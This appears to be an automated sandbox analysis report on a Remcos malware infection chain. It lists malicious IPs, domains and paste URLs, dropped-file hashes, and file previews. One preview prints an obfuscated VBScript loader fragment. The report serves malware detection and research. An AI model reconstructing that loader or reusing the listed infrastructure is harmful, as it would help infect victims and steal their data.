11:35:58	API Interceptor	107x Sleep call for process: wscript.exe modified
11:36:00	API Interceptor	260x Sleep call for process: powershell.exe modified
11:36:12	API Interceptor	8027495x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.95.60.75	5FU4LRpQdy.rtf	Get hash	malicious	Remcos	Browse	23.95.60.75/80/HMF.txt
23.95.60.75	DETAILS.docx.doc	Get hash	malicious	Remcos	Browse	23.95.60.75/80/HMF.txt
178.237.33.50	z42MNA2024000000041-KWINTMADI-11310Y_K.exe	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	z14Novospedidosdecompra_Profil_4903.exe	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exe	Get hash	malicious	Remcos, DBatLoader	Browse	geoplugin.net/json.gp
	UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	Invoice No. 03182024.docx	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	AWB DOCUMENT.vbs	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	XY2I8rWLkM.exe	Get hash	malicious	Remcos, DBatLoader	Browse	geoplugin.net/json.gp
	2020.xls	Get hash	malicious	Remcos, DBatLoader	Browse	geoplugin.net/json.gp
	dhl_doc_awb_shipping_invoice_18_04_2024_000000000000024.vbs	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	tu.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
104.21.84.67	Chitanta bancara - #113243.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/u4bvR
	rdevuelto_Pagos.wsf	Get hash	malicious	AgentTesla	Browse	paste.ee/d/SDfNF
	Product list 0980DF098A7.xls	Get hash	malicious	Unknown	Browse	paste.ee/d/enGXm
	Payment_advice.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/wXm0Y
	SHREE GANESH BOOK SERVICES-347274.xls	Get hash	malicious	Unknown	Browse	paste.ee/d/eA3FM
	dereac.vbe	Get hash	malicious	Unknown	Browse	paste.ee/d/JZHbW
	P018400.xla.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/kmRFs
	comprobante0089.xla.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/cJo7v
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/EgkAG
	87645345.vbs	Get hash	malicious	XWorm	Browse	paste.ee/d/IJGyf

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
paste.ee	SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsx	Get hash	malicious	AgentTesla	Browse	172.67.187.200
	Invoice No. 03182024.docx	Get hash	malicious	Remcos	Browse	172.67.187.200
	eInvoicing_pdf.vbs	Get hash	malicious	FormBook	Browse	172.67.187.200
	F723838674.vbs	Get hash	malicious	Unknown	Browse	104.21.84.67
	Signed Proforma Invoice 3645479_pdf.vbs	Get hash	malicious	FormBook	Browse	172.67.187.200
	F723838674.vbs	Get hash	malicious	Remcos	Browse	104.21.84.67
	DHL Receipt_pdf.vbs	Get hash	malicious	AgentTesla	Browse	104.21.84.67
	Remittance slip.vbs	Get hash	malicious	Unknown	Browse	104.21.84.67
	SecuriteInfo.com.Exploit.ShellCode.69.31966.31539.rtf	Get hash	malicious	Remcos	Browse	104.21.84.67
	F873635427.vbs	Get hash	malicious	Remcos, XWorm	Browse	172.67.187.200
sembe.duckdns.org	5FU4LRpQdy.rtf	Get hash	malicious	Remcos	Browse	194.187.251.115
	DETAILS.docx.doc	Get hash	malicious	Remcos	Browse	194.187.251.115
	TSTS 0005A.bat.exe	Get hash	malicious	Remcos	Browse	194.187.251.115
	UNB-PIO88938MBANSOP.docx.doc	Get hash	malicious	Remcos	Browse	194.187.251.115
	SecuriteInfo.com.Exploit.ShellCode.69.22577.16704.rtf	Get hash	malicious	Remcos	Browse	194.187.251.115
	240202PIMXF24C.docx.doc	Get hash	malicious	Remcos	Browse	194.187.251.115
	DHL-LHER0006981753.docx.doc	Get hash	malicious	Remcos	Browse	194.187.251.115
	17020384843af0d57b8c47e4f7c45e8ba4414521303dd4972bbccb99aeb71a0d3645cbebd8676.dat-decoded.exe	Get hash	malicious	Remcos	Browse	194.187.251.115
	YMIST0035362.docx.doc	Get hash	malicious	Remcos	Browse	194.187.251.115
	HCLcleanupcachecookiebacupcleanall.doc	Get hash	malicious	Remcos	Browse	194.187.251.115
uploaddeimagens.com.br	SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	Invoice No. 03182024.docx	Get hash	malicious	Remcos	Browse	172.67.215.45
	eInvoicing_pdf.vbs	Get hash	malicious	FormBook	Browse	104.21.45.138
	F723838674.vbs	Get hash	malicious	Unknown	Browse	104.21.45.138
	Signed Proforma Invoice 3645479_pdf.vbs	Get hash	malicious	FormBook	Browse	104.21.45.138
	F723838674.vbs	Get hash	malicious	Remcos	Browse	104.21.45.138
	DHL Receipt_pdf.vbs	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	Remittance slip.vbs	Get hash	malicious	Unknown	Browse	104.21.45.138
	SecuriteInfo.com.Exploit.ShellCode.69.31966.31539.rtf	Get hash	malicious	Remcos	Browse	104.21.45.138
	F873635427.vbs	Get hash	malicious	Remcos, XWorm	Browse	104.21.45.138
geoplugin.net	z42MNA2024000000041-KWINTMADI-11310Y_K.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	z14Novospedidosdecompra_Profil_4903.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exe	Get hash	malicious	Remcos, DBatLoader	Browse	178.237.33.50
	UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	Invoice No. 03182024.docx	Get hash	malicious	Remcos	Browse	178.237.33.50
	AWB DOCUMENT.vbs	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:24e81d17-b801-4fad-ae25-120d655923c5	Get hash	malicious	Remcos	Browse	178.237.33.50
	XY2I8rWLkM.exe	Get hash	malicious	Remcos, DBatLoader	Browse	178.237.33.50
	2020.xls	Get hash	malicious	Remcos, DBatLoader	Browse	178.237.33.50
	dhl_doc_awb_shipping_invoice_18_04_2024_000000000000024.vbs	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-COLOCROSSINGUS	https://28.104-168-101-28.cprapid.com/Pay-PaI/	Get hash	malicious	PayPal Phisher	Browse	104.168.101.28
	SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsx	Get hash	malicious	AgentTesla	Browse	192.3.216.151
	ew3OL4dYca.elf	Get hash	malicious	Unknown	Browse	172.245.119.63
	H6ccnU1094.elf	Get hash	malicious	Mirai, Okiru	Browse	23.95.165.132
	SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exe	Get hash	malicious	Remcos, DBatLoader	Browse	192.3.193.55
	Invoice No. 03182024.docx	Get hash	malicious	Remcos	Browse	192.210.201.57
	PO_983888123.xls	Get hash	malicious	Unknown	Browse	107.173.4.2
	PO_983888123.xls	Get hash	malicious	Unknown	Browse	107.173.4.2
	PO_983888123.xls	Get hash	malicious	Unknown	Browse	107.173.4.2
	Kt28gy4sgm.elf	Get hash	malicious	Mirai	Browse	104.168.45.11
CLOUDFLARENETUS	Receipt_7814002.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	Essay on Resolution of Korean Forced Labor Claims.vbs	Get hash	malicious	Unknown	Browse	104.26.15.182
	VN24A02765.PDF.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	ShippingOrder_ GSHS2400052.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	172.67.74.152
	qk9TaBBxh8.exe	Get hash	malicious	LummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	172.67.180.119
	SecuriteInfo.com.Win32.PWSX-gen.25825.12964.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	0OqTUkeaoD.exe	Get hash	malicious	RedLine	Browse	104.20.3.235
	https://bj8lt4fm8evwyl.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	172.66.47.24
	https://jainpokliultachor.pages.dev/	Get hash	malicious	Unknown	Browse	104.22.24.131
	https://pusha1qsn.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	104.21.53.38
ATOM86-ASATOM86NL	z42MNA2024000000041-KWINTMADI-11310Y_K.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	z14Novospedidosdecompra_Profil_4903.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exe	Get hash	malicious	Remcos, DBatLoader	Browse	178.237.33.50
	UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	Invoice No. 03182024.docx	Get hash	malicious	Remcos	Browse	178.237.33.50
	AWB DOCUMENT.vbs	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:24e81d17-b801-4fad-ae25-120d655923c5	Get hash	malicious	Remcos	Browse	178.237.33.50
	XY2I8rWLkM.exe	Get hash	malicious	Remcos, DBatLoader	Browse	178.237.33.50
	2020.xls	Get hash	malicious	Remcos, DBatLoader	Browse	178.237.33.50
	dhl_doc_awb_shipping_invoice_18_04_2024_000000000000024.vbs	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
CLOUDFLARENETUS	Receipt_7814002.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	Essay on Resolution of Korean Forced Labor Claims.vbs	Get hash	malicious	Unknown	Browse	104.26.15.182
	VN24A02765.PDF.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	ShippingOrder_ GSHS2400052.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	172.67.74.152
	qk9TaBBxh8.exe	Get hash	malicious	LummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	172.67.180.119
	SecuriteInfo.com.Win32.PWSX-gen.25825.12964.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	0OqTUkeaoD.exe	Get hash	malicious	RedLine	Browse	104.20.3.235
	https://bj8lt4fm8evwyl.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	172.66.47.24
	https://jainpokliultachor.pages.dev/	Get hash	malicious	Unknown	Browse	104.22.24.131
	https://pusha1qsn.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	104.21.53.38

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsx	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	Invoice No. 03182024.docx	Get hash	malicious	Remcos	Browse	172.67.215.45
	2020.xls	Get hash	malicious	Remcos, DBatLoader	Browse	172.67.215.45
	SecuriteInfo.com.Exploit.ShellCode.69.31966.31539.rtf	Get hash	malicious	Remcos	Browse	172.67.215.45
	5FU4LRpQdy.rtf	Get hash	malicious	Remcos	Browse	172.67.215.45
	yDOZ8nTvm8.rtf	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	DETAILS.docx.doc	Get hash	malicious	Remcos	Browse	172.67.215.45
	L2165c5ZiO.rtf	Get hash	malicious	Remcos	Browse	172.67.215.45
	Qzr31SUgrS.rtf	Get hash	malicious	Remcos	Browse	172.67.215.45
	OFFER DETAIL 75645.xls	Get hash	malicious	Remcos	Browse	172.67.215.45
7dcce5b76c8b17472d024758970a406b	SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.84.67
	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Get hash	malicious	PureLog Stealer, zgRAT	Browse	104.21.84.67
	Invoice No. 03182024.docx	Get hash	malicious	Remcos	Browse	104.21.84.67
	2020.xls	Get hash	malicious	Remcos, DBatLoader	Browse	104.21.84.67
	CTM REQUEST BIRTHSHIP.doc	Get hash	malicious	AgentTesla	Browse	104.21.84.67
	SecuriteInfo.com.Exploit.ShellCode.69.31966.31539.rtf	Get hash	malicious	Remcos	Browse	104.21.84.67
	TransactionSummary_910020049836765_110424045239.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.84.67
	rks18.doc	Get hash	malicious	AgentTesla	Browse	104.21.84.67
	5FU4LRpQdy.rtf	Get hash	malicious	Remcos	Browse	104.21.84.67
	NEW ORDER.doc	Get hash	malicious	HTMLPhisher	Browse	104.21.84.67

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Non-ISO extended-ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	204105
Entropy (8bit):	5.165709687166053
Encrypted:	false
SSDEEP:	3072:A1yO1lQ014CTt1ns3wflGsZcfo0QA5PGpb8h0:A191lF1rflGsZcfu
MD5:	9D7684F978EBD77E6A3EA7EF1330B946
SHA1:	3FA2D2963CBF47FFD5F7F5A9B4576F34ED42E552
SHA-256:	6C96E976DC47E0C99B77814E560E0DC63161C463C75FA15B7A7CA83C11720E82
SHA-512:	496EC0BA2EEA98355F18201E9021748AB32DE7E5996C54D9C5C4AFBE34B1C7CD2F50E05EC50F2C552E04E121BEDFFED6234ED111C25FC7A2454B33A1D6C55D6F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	'..' Copyright (c) Microsoft Corporation. All rights reserved...'..' VBScript Source File..'..' Script Name: winrm.vbs..'....Option Explicit....'''''''''''''''''''''..' Error codes..private const ERR_OK = 0..private const ERR_GENERAL_FAILURE = 1....'''''''''''''''''''''..' Messages..private const L_ONLYCSCRIPT_Message = "Can be executed only by cscript.exe."..private const L_UNKOPNM_Message = "Unknown operation name: "..private const L_OP_Message = "Operation - "..private const L_NOFILE_Message = "File does not exist: "..private const L_PARZERO_Message = "Parameter is zero length #"..private const L_INVOPT_ErrorMessage = "Switch not allowed with the given operation: "..private const L_UNKOPT_ErrorMessage = "Unknown switch: "..private const L_BLANKOPT_ErrorMessage = "Missing switch name"..private const L_UNKOPT_GenMessage = "Invalid use of command line. Type ""winrm -?"" for help."..private const L_HELP_GenMessage

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	4760
Entropy (8bit):	4.831175347448903
Encrypted:	false
SSDEEP:	96:ACJ2Woe5v2k6Lm5emmXIGbgyg12jDs+un/iQLEYFjDaeWJ6KGcmXoFRLcU6/KD:vxoe5vVsm5emdkgkjDt4iWN3yBGHUdcY
MD5:	A50F0B3600A83789D28B424D69626266
SHA1:	0183DA34933788FF97602C9DEA82F39CAD0697C2
SHA-256:	7B188A9EEAC0649E088208C137625F64175EDAC8AE7F25D8A0F8B5611C824A8A
SHA-512:	335DCAA6FE83BC0F492B353C036EA2A5CA52ECE628520A3E50BAF7C373D4CDBAC7585341D91D9B210C3EC4378525AA934CCB5BB418C4D776105FBB59F4873216
Malicious:	false
Preview:	PSMODULECACHE......%+./...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........%+./...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetworkings[1].htm

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
Category:	dropped
Size (bytes):	114022
Entropy (8bit):	3.7159705325755374
Encrypted:	false
SSDEEP:	1536:y++/U1lBHFcJUJI+YZb5bJ9Gmgz/+rtfRDFqGb5uJZUU0tKl9CP8Z:y/U1DHFUGmgURDFBe0tKl9CP4
MD5:	42D96A63FE345FE4A01752E1DCB06D1D
SHA1:	F8D791007C1507CD15FDB53EE3F0CA477E7698EA
SHA-256:	D27CB4DE5A03F7B59AB211482839E4D18EC395C136079735636CA23B096531D0
SHA-512:	B87B3F16A8F437731E8E26FB09478A708F0A079EEEBD5CD22CAC3F23F239C521A34C837FAFACB1C979109BB173DC6227008F0C70DF57A897A52461F2D0721B83
Malicious:	false
Preview:	......'.....c.o.n.s.t. .b.r.o.s.i.m.o. . . . . . . . . . .=. .0.....c.o.n.s.t. .k.A.c.t.i.o.n.D.e.l.e.t.e. . . . . . . .=. .1.....c.o.n.s.t. .k.A.c.t.i.o.n.L.i.s.t. . . . . . . . . .=. .2.....c.o.n.s.t. .b.r.e.n.s.e.d.a. . . . . . .=. .3.....c.o.n.s.t. .a.r.a.v.i.a. . . . . . . . . . .=. .4.....c.o.n.s.t. .m.o.r.i.b.u.n.d.o. . . . . . . . . . .=. .5.........c.o.n.s.t. .v.i.l.i.a.s.t.r.o. . . . . . . .=. .0.....c.o.n.s.t. .K.E.r.r.o.r.F.a.i.l.u.r.e. . . . . . . .=. .1.........c.o.n.s.t. .k.F.l.a.g.C.r.e.a.t.e.O.r.U.p.d.a.t.e. .=. .0.........c.o.n.s.t. .a.g.u.s.t.i.n.a. . . . . . . . . . .=. .".r.o.o.t.\.c.i.m.v.2.".............'.....'. .C.o.n.s.t.a.n.t.s. .f.o.r. .t.h.e. .p.a.r.a.m.e.t.e.r. .d.i.c.t.i.o.n.a.r.y.....'.....c.o.n.s.t. .a.d.i.n.a.m.i.a. . . . . . .=. .1.....c.o.n.s.t. .s.u.x.o. . . . . . . . .=. .2.....c.o.n.s.t. .k.D.o.u.b.l.e.S.p.o.o.l. . . . . .=. .3.....c.o.n.s.t. .k.P.o.r.t.N.u.m.b.e.r. . . . . . .=. .4.....c.o.n.s.t. .k.P.o.r.t.T.y.p.e. . . . . . . . .=. .5.....c.o.n.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\json[1].json

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	4.995921748950886
Encrypted:	false
SSDEEP:	12:tklzTknd6UGkMyGWKyGXPVGArwY3+8aIHrGIArpv/mOAaNO+ao9W7iN5zzkw7R+2:qlkdVauKyGX855vXhNlT3/77Kdxtro
MD5:	57C36A4D45733B4304D0ED59EDA89921
SHA1:	D304B73EE632B7839808A761FDC19CD23280D62E
SHA-256:	C6C00D5FC9257C069D61A76B5C8C8762F9EE120F8C7BBFC157D3169C24D95F8F
SHA-512:	1DE275B4992B9EB368BF0DA068812FC43E30FAEAC2CFCD0BF5DFF823479D6B3758D5F74078123DA46A0671F217FB2BE5D53D79A641D7BE6DB9ECEAE6F0F4FDC7
Malicious:	false
Preview:	{. "geoplugin_request":"81.181.57.52",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Marietta",. "geoplugin_region":"Georgia",. "geoplugin_regionCode":"GA",. "geoplugin_regionName":"Georgia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"524",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"34.0414",. "geoplugin_longitude":"-84.5053",. "geoplugin_locationAccuracyRadius":"1000",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\UZOyJ[1].txt

Download File

Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	Unicode text, UTF-8 text, with very long lines (11123), with CRLF line terminators
Category:	dropped
Size (bytes):	13229
Entropy (8bit):	4.747083496854198
Encrypted:	false
SSDEEP:	384:Y/VwiDCXdu3NF3S0P0V2VVSUEEJNcr5+EJNcr5z525f+ofhuSw309RWEd+m0Wio9:Y/Si+Xd0NNbP0V2VMUEEJNcV+EJNcVzg
MD5:	BBDA92E82F45A249A542B40C6ECFA507
SHA1:	AA678D29BA51F72A02C73F898EBBE0EB6CE60A74
SHA-256:	3B0A938DEFF8206E336AC2FD86C31C3F9AD22E493BA037C2BC14C7B424E3F4EB
SHA-512:	DCF8B1556440CA86E5FF963812EF071464A6F00249BA039CE20B68CBE5A571C010D2537B86E23563B4DC47465230B3C1279BD5C411B1A864DE38B1332F2B9079
Malicious:	false
Preview:	.. dim recorte , imutar , hidrante , taquidrito , progressivamente , Cama , progressivamente1.. imutar = " ".. hidrante = "" & taquidrito & imutar & taquidrito & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & taquidrito & imutar & taquidrito & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & taquidrito & imutar & taquidrito & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & taquidrito & imutar & taquidrito & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & taquidrito & imutar & taquidrito & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & taquidrito & imutar & taquidrito & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre"

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{06BA4240-94DA-46E6-9018-D99C6787D57E}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	4.05556665517814
Encrypted:	false
SSDEEP:	24:r7CdqoZ8cP08nWCNm+ftYs801x061V61xRvVVLHhAD4sb1aWchM9fQ/sZ5bGMBlE:riQCN53CRXIpxcS9I4bPW4ceDt
MD5:	C4103230B2C47BF75C1785DA9EE9E194
SHA1:	03B330512010D300C5E003C2D261D3E7E55A6D65
SHA-256:	D7CA2802533914CE1A5C5779785405DB00BB95E5FD0C85310142470B2BADE4E5
SHA-512:	B6859C0EE50DC036FECFD7FAA07BAF93F42EBEC5D61BC20913449CA11D9612A777C5A6599B7821A186E9476A2B08091D335E97D5FCF7B9AB380A3CA98A1B68F3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B6ABBD88-0240-4BF7-AF42-5B250ACE83CC}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EB05A44A-113C-4A5B-9680-D9BF23BED5BF}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	3.55177146041303
Encrypted:	false
SSDEEP:	192:9Qa+d10m0fZ/qiz6IruClhuhbTptf5mvcIs4vFelXDtizcqq4jYvzDDOmZ:9Qa4hrs6IruCSz5ZIZ0dpT4jYvzHBZ
MD5:	12FE8536562DBB34C647BF8E03B138BF
SHA1:	396AE03DE7750D14E66EF2FBF123EA8315C15C07
SHA-256:	1B4DE8D297AE329F724AD558CE1BB136C196A4E50AE747D09F3734FFF92A4A39
SHA-512:	646E6AE60692996C186B539832EB466C34AC88925297CB9B31EB86C7EA148DE45E6B3F9EAA084CFED8C2F92D45BE88E3F992510899C96A8AB36C3C9A8398B2DE
Malicious:	false
Preview:	....................3.5.6.5.0.1.6.4....).%.9./.8.@....>.?.1...1...9.&.$.6.=.$.?.~.$.~.-.(.?.,...8..:.(.1.0.-.!.^.-.~...5.].+.3.$.5./.).<.(.2.&.8.6.......?.?.[.\|.1..~.%.%.+.3...].9.].?.%.1.).%.]._.,.-.7.~.^.?./.[.1.(./.`.#.?.#.4.5...2.0.(.(.9.?.:.@.>...<.2.=.%.?.!.&...4.(.!.-.9._...%..].\|.5.?.?.#.=...)./.?.?.&.].'...7.!.3./.$.@.!.@.%...&.@.(.7.\|.;.=.6.%.0.,.4.?.?.?.(.?.].?..[.,...&.7.?.?.'...?.[.<.1.!.&.=.?.3.`.3.@..-.!.!.<.?.;.,.?.-.4.%.&.[.'.`.!.?.+.=.^.+...+.:.\|.%./.+.).5.[.?.$..\|.!.$.?.?.9...1.;.[.%.?./.\|.0.,.@...&.'.<.?.!.?.2...).:.:.(.3.1.@.,.'.~...2.%.0.0.=.?.9.?.8...?.<.5...).^.].$...7...?._.;.:.'...,.(.'.1.%./.....5.@.).?.0.<.5.?...<./.1.;.=.7.#.(.>.9.:...6.&.>.7.=.(.'.?.$.4.;.$.$.?.<.<.].7...>.2.7...)..~.`..._._.=.>.8.1.6.\|.#...@.?.%...5.<.7.3.(.!.#.;.~.`.+.2._.$.0.$.+.^.<.-.~.[.6.&.3.=.].>.../.8..6.0...5.5.8.7.;..>.>.?.%...2.^.+...@.[.%.'.?.#.'.[.6...@.3._.(.@.?.?.'.-.<..'.].?.^.!.?.9.?.5.-.........^.?.:.5.%..8..+.'...(.%.-.^.-.?.8...%.0.=.2.[.+.%.@.(.!.(.6.?.

C:\Users\user\AppData\Local\Temp\52swewso.gka.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

